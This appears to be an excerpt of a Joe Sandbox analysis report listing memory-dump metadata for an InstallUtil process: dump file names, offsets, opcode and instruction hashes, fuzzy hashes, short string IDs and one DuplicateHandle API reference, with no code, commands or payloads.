                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CH\-$WH\-$[H\-
                                • API String ID: 0-2403036194
                                • Opcode ID: 5ed095fbd348708fc27486784584bfe668b6c87c80fa9dc306095edbc6a60ca9
                                • Instruction ID: c1beeaee003aa43b413f958be28d26124e159dfb9ea52473a603f95f8d0248c6
                                • Opcode Fuzzy Hash: 5ed095fbd348708fc27486784584bfe668b6c87c80fa9dc306095edbc6a60ca9
                                • Instruction Fuzzy Hash: CD816030E1035A8FDB58EFA5D45069EB7F2FF89304F208529E909EF354EB7098468B91

                                Control-flow Graph
                                • Rendered graph (legend: Executed / Not Executed); node/edge list not reproduced. First listed block: 6a3fbc3. No call edges in the listed graph.
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: H\-$oH\-
                                • API String ID: 0-2512982594
                                • Opcode ID: 0f59810df606978c06cf48c22c3f7114b284c4c8d30d758c6c71c2059e1979c0
                                • Instruction ID: 0ec56b592c2738328d95697e6e2327fb9f9099243fc6ba1c815b3a9657fe1343
                                • Opcode Fuzzy Hash: 0f59810df606978c06cf48c22c3f7114b284c4c8d30d758c6c71c2059e1979c0
                                • Instruction Fuzzy Hash: 19415534F1011A9FEB98EBA8D4A07AEB6F6EBC5340F108429E509EF395DE34DC418B51

                                Control-flow Graph
                                • Rendered graph (legend: Executed / Not Executed); node/edge list not reproduced. First listed block: 6a37b08. No call edges in the listed graph.
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 399f936f8ae12f5a0687e4a105098cf0094c22d27f022631420353c69dbca268
                                • Instruction ID: 4982ba912c990d7e6d6712a3798de63040f1bafd92e23dcd6a74dfe4265822f1
                                • Opcode Fuzzy Hash: 399f936f8ae12f5a0687e4a105098cf0094c22d27f022631420353c69dbca268
                                • Instruction Fuzzy Hash: 7131E875F012285FDB58EFB884517EE76F5EB88A50F104065E806FF341EA64DC4187E9

                                Control-flow Graph
                                • Rendered graph (legend: Executed / Not Executed); node/edge list not reproduced. First listed block: 6a37b18. No call edges in the listed graph.
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: CY\-$RY\-
                                • API String ID: 0-1908491093
                                • Opcode ID: 49a3e1c38055e7a5ea027f00b3f5cc2d561546eb84ad60bdaa6047806e0f8027
                                • Instruction ID: d5bbfc5d12c1bc48e760efdccf469872db4b5bd30926d284e76c4c45d58af5f0
                                • Opcode Fuzzy Hash: 49a3e1c38055e7a5ea027f00b3f5cc2d561546eb84ad60bdaa6047806e0f8027
                                • Instruction Fuzzy Hash: 1D31C375F012255FEB48EFB884517EEB6F5EB88A10F148069E906FF381EA30DC4187A5

                                Control-flow Graph
                                • Rendered graph (legend: Executed / Not Executed); node/edge list not reproduced. First listed block: 6a3e8f8. No call edges in the listed graph.
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 55d6ddf718b5932073770e1805fb1b8b510c74a89327e4a9b2db95db48a6dbb7
                                • Instruction ID: 380d1c8f1b24287d580d8a55dc5950d5b55831cb4d04cd73efaa76e2e6d0542b
                                • Opcode Fuzzy Hash: 55d6ddf718b5932073770e1805fb1b8b510c74a89327e4a9b2db95db48a6dbb7
                                • Instruction Fuzzy Hash: B2118224B002655BDBA5AB7984A435EA7E5F7C6650F14486AF14ACF381E925CC014396
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: Px\-$hx\-
                                • API String ID: 0-2001300283
                                • Opcode ID: 4d224ff72bfc19d398abc9c413c9c32dcaf032552b416a4ae1871ae238610d6f
                                • Instruction ID: b7ab715a671e59bfd91f6e802c5492fca0bf151f0dc56872610c6c59c5068058
                                • Opcode Fuzzy Hash: 4d224ff72bfc19d398abc9c413c9c32dcaf032552b416a4ae1871ae238610d6f
                                • Instruction Fuzzy Hash: 1F016234B001255BDFA9AA7D94A476EA2E6FBC5B50F108829F64BCF380ED25DC0147D5
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030BB41F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 0f8c8976c4dbdb07c7b6cbd74916d09ce2f4a811d73d4a370cbe8e47c71714ed
                                • Instruction ID: b99bd867168017bf107dcbcbd3b67e1f157097615f922661305e8f8f0c7cc3aa
                                • Opcode Fuzzy Hash: 0f8c8976c4dbdb07c7b6cbd74916d09ce2f4a811d73d4a370cbe8e47c71714ed
                                • Instruction Fuzzy Hash: 6121E4B5900249EFDB10CFAAD884ADEFBF8FB48310F14801AE914A3310D378A944CF65
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 030BB41F
                                Memory Dump Source
                                • Source File: 00000005.00000002.3408345631.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_30b0000_InstallUtil.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: d696453f07cfd43e52b661eda2f12333e13dd04d5bfe0585b90535c122fd2802
                                • Instruction ID: 3a8edd271563de414f4e451262c0869e4ec23305a4b3a336f2d5c6f3fad4f791
                                • Opcode Fuzzy Hash: d696453f07cfd43e52b661eda2f12333e13dd04d5bfe0585b90535c122fd2802
                                • Instruction Fuzzy Hash: 6B2112B5D00248DFDB10CFA9D984AEEBBF4FB48310F14842AE918A3310C338A954CFA5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2a80908410f8ea5837564a6b935f62c46b733e43a7bd9060936d8174ba6307d1
                                • Instruction ID: 08acf3f51ceaff0c46260d69258b61cf3efe735a4bfaf2d1d75d38f2a7f254ac
                                • Opcode Fuzzy Hash: 2a80908410f8ea5837564a6b935f62c46b733e43a7bd9060936d8174ba6307d1
                                • Instruction Fuzzy Hash: CB61A172F001214BDB54AB7EC89069FA6D7AFD4260B15447AE90EDB360DE65EC0287D1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4cf05a104131ab0bf974e8aebde9584ddd09259b441d5a49724a0e0eb75fd7f9
                                • Instruction ID: 8b629f1702969eee975d74530e0f2fe5c683b2e6afe75b6cc7a33c94b568a98d
                                • Opcode Fuzzy Hash: 4cf05a104131ab0bf974e8aebde9584ddd09259b441d5a49724a0e0eb75fd7f9
                                • Instruction Fuzzy Hash: 38916D30E1061A8FDF60DF68C850B9DB7B1FF89310F208599E549BB245EB74A985CF91
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: badb55c221b9dafb4fe9bb6d2f830363734201f4c9fba5c9736b1fa1b4f97e0d
                                • Instruction ID: 0105d1b5ff6785e023f751ea5b78cbb59297e454d7925d61b330fa559473d068
                                • Opcode Fuzzy Hash: badb55c221b9dafb4fe9bb6d2f830363734201f4c9fba5c9736b1fa1b4f97e0d
                                • Instruction Fuzzy Hash: CD912D34E1061A8BDF60DF68C890B9DB7B1FF89310F208599E549BB345EB70A985CF51
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a2c0fda15646619cf1ca5da0009f02e454a52db22625e7c1dd5975b87ff45d4e
                                • Instruction ID: a3b0f6b9f860b0345846c02e4888be8be9cab07b17fe896622d13986cfc0f834
                                • Opcode Fuzzy Hash: a2c0fda15646619cf1ca5da0009f02e454a52db22625e7c1dd5975b87ff45d4e
                                • Instruction Fuzzy Hash: 41518470F002199FDB94ABA5C4547AEBAF6FBC8750F208429E506EB395DE788C018B95
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 394f270aae05d2b5bb57ad4cf4a4f7470c609d23eaf8235fa37b3f32a0c62f0b
                                • Instruction ID: b99c304b219e045b0a526f3d8e1e3903e23a35679aec01c395c0976897331dce
                                • Opcode Fuzzy Hash: 394f270aae05d2b5bb57ad4cf4a4f7470c609d23eaf8235fa37b3f32a0c62f0b
                                • Instruction Fuzzy Hash: 2641A970B002199BEB94ABA4C4247AE7AF7FBC4740F204429E506EF3D4DE789C018B91
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17428ed0b03010175ccccfe9d140049b4b75353c07a4d8a880ac375a2e2cf4d4
                                • Instruction ID: 4e802f19e80e9a78074a44c24b8b24bb6d2f097755be914ed7ca9f9b749e60df
                                • Opcode Fuzzy Hash: 17428ed0b03010175ccccfe9d140049b4b75353c07a4d8a880ac375a2e2cf4d4
                                • Instruction Fuzzy Hash: 27417275E001158BDB64DF69C4C0B7FF7A2FB85310F64892AE11ADB281E674E841CB91
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2b6fcaace4ec2e5c468cbd8482818d39a435c6202075f578954d2afa4fdbf5fc
                                • Instruction ID: 10d515d7b958ef4dc0ec3a21515dd7650d63ee5d0e87a5132d47e166973b31e2
                                • Opcode Fuzzy Hash: 2b6fcaace4ec2e5c468cbd8482818d39a435c6202075f578954d2afa4fdbf5fc
                                • Instruction Fuzzy Hash: 1D414071E006198FDF70DF99D880AAFF7B2FB85214F10492AE116D7650E371E9898B91
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 61ba0a8a52b32169bdb7fa1c0491232d84a3208fbeab23e52fdf484d61def71c
                                • Instruction ID: 3acafefc09b70da500840cf2497b72042133653a54eac6577e93aee0d20bc761
                                • Opcode Fuzzy Hash: 61ba0a8a52b32169bdb7fa1c0491232d84a3208fbeab23e52fdf484d61def71c
                                • Instruction Fuzzy Hash: 6F41D330B002169FDB99AB7895642AF77E7BFCA650F248468E006DF394EE31CC06C795
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7c23c91555760ea77c2b44481d35b90a37e8744625ff0caa690bd695565d6c03
                                • Instruction ID: 866a655a0c85f5e51cf9538a9593d7fd6a6ce1864ef568d23d1ac01edc021f4a
                                • Opcode Fuzzy Hash: 7c23c91555760ea77c2b44481d35b90a37e8744625ff0caa690bd695565d6c03
                                • Instruction Fuzzy Hash: C331A130B002169FDB99AB78C5646AE76E7BFCA650F64846CE006DF394EE31CC06C791
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5096a5033d19ffc0af529cd24e9e6fa76cdb73a31ee82c53c15f4801988e51b3
                                • Instruction ID: 03cb56a845d5d07a4b1114b6ae905737cf2c2b6b7ad50cbae793fb7f0970726a
                                • Opcode Fuzzy Hash: 5096a5033d19ffc0af529cd24e9e6fa76cdb73a31ee82c53c15f4801988e51b3
                                • Instruction Fuzzy Hash: F0315235E102558BDB59DF68D45469EB7F2FF89300F24C929E816EB340DB74AC42CB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5044e2bfe00944ef99b33a034ef250bfea627512b8a2a1446729467de19eae58
                                • Instruction ID: fbc09b99b39c40099b5a468f6575a4e4a7c4d32e82f5ba861bd24cab649ee452
                                • Opcode Fuzzy Hash: 5044e2bfe00944ef99b33a034ef250bfea627512b8a2a1446729467de19eae58
                                • Instruction Fuzzy Hash: 5A316230E102159BDB59DF68D49469EB7F2FF89300F20C929E806EB350DB74AC41CB90
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407743347.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 523fd94d6be60e934be317142f9ac54e808dfa0e1ae06b7579998d56373c115e
                                • Instruction ID: 4847b507f1f82b480af96a650d2a0ae1f42774223ce422f6a1ef8e5cc3d9f46f
                                • Opcode Fuzzy Hash: 523fd94d6be60e934be317142f9ac54e808dfa0e1ae06b7579998d56373c115e
                                • Instruction Fuzzy Hash: C2210375604204EFDB15DF64D580B26BBB9FB84324F20C96DD9890F242D33BD446CAA1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 17f7b37d831b23f9c1336676537659f895ec66e906b0f000207132fa4e8a71d5
                                • Instruction ID: eeac355d2574cbd7fa6f21885c092739749972dd9d490d9ff3d661928483a55d
                                • Opcode Fuzzy Hash: 17f7b37d831b23f9c1336676537659f895ec66e906b0f000207132fa4e8a71d5
                                • Instruction Fuzzy Hash: FB214174E002299FCF94EB68D9546DEBBF1EF89310F104569E509EB241EA329944CF94
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2aed4d7da8ebb55a09285b37e5e40eaed7b5722b431ac865e20412d6542150f
                                • Instruction ID: bff4b9ffaf7bfadeba0870ffbe8fa6af0509dce0960561b1b0aa647bb1c75e98
                                • Opcode Fuzzy Hash: e2aed4d7da8ebb55a09285b37e5e40eaed7b5722b431ac865e20412d6542150f
                                • Instruction Fuzzy Hash: FE118271B111654FDB98E6B988506BF72FBEBC8660F144479E407EB344EE72DC0187A1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: a70c07146cf5fdcbb9caec75231a4e73ce08ad76143e76e40f7999c3c652d06d
                                • Instruction ID: 92a3958fa54033feb7f6effed9d8e5cb1c16198bcfa1355e786894bb87b22eac
                                • Opcode Fuzzy Hash: a70c07146cf5fdcbb9caec75231a4e73ce08ad76143e76e40f7999c3c652d06d
                                • Instruction Fuzzy Hash: 4111C071B002254FDF61A73C985076ABBD6EBCA710F24842AF50ACB785E965DC028395
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407743347.000000000156D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0156D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_156d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8360832d9f520a3c8dad43b700b8073c2a089a7836da82b68c9a2e2f1003c6cb
                                • Instruction ID: 1553c0f591d9b7bffac44b409d3ca264d6c055555eaf1d9da1c97621e058ba98
                                • Opcode Fuzzy Hash: 8360832d9f520a3c8dad43b700b8073c2a089a7836da82b68c9a2e2f1003c6cb
                                • Instruction Fuzzy Hash: F12183755093809FC702CF24D590715BF71FB46214F28C5DAD8898F267C33A980ACBA2
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62d50a8b72e9d2abdf966f72d9c06960e411f5bcbae99e80bb8fef28c4740552
                                • Instruction ID: 8cebe4246d5bb172ea2012e765348813a56720c3da297594c5e7a5a1735aa2aa
                                • Opcode Fuzzy Hash: 62d50a8b72e9d2abdf966f72d9c06960e411f5bcbae99e80bb8fef28c4740552
                                • Instruction Fuzzy Hash: D5014532B101680BDB88E7B988607EF66EBDBC8661F04007AE10BEB340FE61CC0183D5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3bb02b2f6a8f17f555baeb7662076db105b56c288f9391e5f632867433fa5ba4
                                • Instruction ID: 8b59603e7d02a4aa8adffbb5b4939b486b3032b3c68dd0878b72d52b034d5886
                                • Opcode Fuzzy Hash: 3bb02b2f6a8f17f555baeb7662076db105b56c288f9391e5f632867433fa5ba4
                                • Instruction Fuzzy Hash: 7921C2B5D01259EFCB40DF9AD885ADEFBB4FB48710F10822AE518B7300D374A954CBA5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9cae134c9b0a11416470d4898f2a7783bc7c3de9b6eaad608a3fad4aa9f5a935
                                • Instruction ID: aa94ad5d4747c1f651e6980e318a804c2920a3477fecc5207452eb9c63189363
                                • Opcode Fuzzy Hash: 9cae134c9b0a11416470d4898f2a7783bc7c3de9b6eaad608a3fad4aa9f5a935
                                • Instruction Fuzzy Hash: F111C2B5D01259EFCB40DF9AD884ADEFBB4FB48710F10822AE518A7200C374A954CBA5
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cfd99763563b0512d6b58b084699f32c6ae8799b0a5c0a433fa1c3cf6c8e2b14
                                • Instruction ID: bce12c0e8c2517357c6727775e9e7152f84e81c408c01347e1619112a1ed3145
                                • Opcode Fuzzy Hash: cfd99763563b0512d6b58b084699f32c6ae8799b0a5c0a433fa1c3cf6c8e2b14
                                • Instruction Fuzzy Hash: DE016D31B005250BDB65A77DA45472BB2DAEBC9710F20883AF60ECB344ED65DC028395
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6ec818ea5ded700f91a5a090d4a36f308d53d54b5a8c1a74f746173d3cec597
                                • Instruction ID: 06aaf0ea9012dd83124c40a1193fcad640630771927e2f9c4a2b815de970ec49
                                • Opcode Fuzzy Hash: d6ec818ea5ded700f91a5a090d4a36f308d53d54b5a8c1a74f746173d3cec597
                                • Instruction Fuzzy Hash: AE01F731B041259FDFA8BBA89D612BC72E5EBC06A0F14602AE907EF241EF60CD018795
                                Memory Dump Source
                                • Source File: 00000005.00000002.3407643095.000000000155D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_155d000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d0ba181bba970514fd95e126f3b94024342b340d40b428043e9a7fd8bbbe6ed1
                                • Instruction ID: 17ac527c0b40eb8838bc3d4bcbc75732af74478f64fe8c34c279d8954ac9d052
                                • Opcode Fuzzy Hash: d0ba181bba970514fd95e126f3b94024342b340d40b428043e9a7fd8bbbe6ed1
                                • Instruction Fuzzy Hash: 19F0C272404344EAE7108E0AC894B66FFE8EB51624F18C45BED0C0E287C2799845CAB1
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ade3362a6133b060bb2318fff63dccee1f092358b2c8243b8dcf90a58486b045
                                • Instruction ID: 4119b9f1cb946ba2b58654612c94157ac302e70b09d5306762ca85ac08d66e07
                                • Opcode Fuzzy Hash: ade3362a6133b060bb2318fff63dccee1f092358b2c8243b8dcf90a58486b045
                                • Instruction Fuzzy Hash: BBF02021E193A8ABDB60EB30890538A3FA88B83214F1548AAF584CF142E571C9058392
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9224ffcde71e7254bf9f238bb34dc5d28ed26a03892d668b662e436a87e3d05d
                                • Instruction ID: 71dbe3d4645d9f1f114de269a8ec6e851d7f212d74a53b6e41a055e664527901
                                • Opcode Fuzzy Hash: 9224ffcde71e7254bf9f238bb34dc5d28ed26a03892d668b662e436a87e3d05d
                                • Instruction Fuzzy Hash: 26F0DA70A2012ADFDB64DF90E969BADBBB6BF44710F204119F402AB295CB781C41CB80
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 066b388eeda43513f39c51ae77f2b31a78f390eb466e3062225e7ca49fac300b
                                • Instruction ID: cc0bd9e829e8987ca546de7da80601439ef039f064958d3d90206a25765d1398
                                • Opcode Fuzzy Hash: 066b388eeda43513f39c51ae77f2b31a78f390eb466e3062225e7ca49fac300b
                                • Instruction Fuzzy Hash: F0E0C270E1022CABDF50EFB4CA4575E73ADD702204F2084A5F548CB200E536CE428780
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,s\-$/q\-$<q\-$Nq\-$Sq\-$hq\-$q\-$v\-
                                • API String ID: 0-2351465072
                                • Opcode ID: d3ccf2a6ee161d2a53b1436d35ffa6b2855bd5fb9f4ea075a81e16c86017e63f
                                • Instruction ID: 167b95735f9b1dd488ec2dae18d3af765b7d168692dec07b1c4a69c914f2ccef
                                • Opcode Fuzzy Hash: d3ccf2a6ee161d2a53b1436d35ffa6b2855bd5fb9f4ea075a81e16c86017e63f
                                • Instruction Fuzzy Hash: C5F11834B012198FDB98EBB8C4647AEB7F2BFD4740F208429D41A9F795DA309C45CBA1
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: ,E\-$3E\-$ME\-$SE\-$bE\-$kE\-$yE\-
                                • API String ID: 0-2142556206
                                • Opcode ID: 50b7560ed07ce25b0ce178bea24b2ab871deedb094ca5b1f59bf39e7d88f1998
                                • Instruction ID: 776099238cdf5b48109aded0bfee3071134d412ea7d98c86d722dbb59b38becf
                                • Opcode Fuzzy Hash: 50b7560ed07ce25b0ce178bea24b2ab871deedb094ca5b1f59bf39e7d88f1998
                                • Instruction Fuzzy Hash: C4815574B012159FDB58EBB4E490BAEB6F6BF84650F108429F506EB380EF74EC0187A5
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3413424107.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6a30000_InstallUtil.jbxd
                                Similarity
                                • API ID:
                                • String ID: &B\-$6B\-$@C\-$IC\-$RC\-$kB\-
                                • API String ID: 0-1245943403
                                • Opcode ID: 6d228e6b3178ba6af7214967ce901a4f26547854d77f3b13aa6d2908767bfcb0
                                • Instruction ID: 0419414006e6e98d7e0aa2782d4da29e19119f79c8d0d66bfac2b9fc1a2f07d8
                                • Opcode Fuzzy Hash: 6d228e6b3178ba6af7214967ce901a4f26547854d77f3b13aa6d2908767bfcb0
                                • Instruction Fuzzy Hash: 7BC12130F012598FDB58EB74C850BAEB6F2BFC9640F1045A9D40AEB355EE319D81CB91
                                Strings
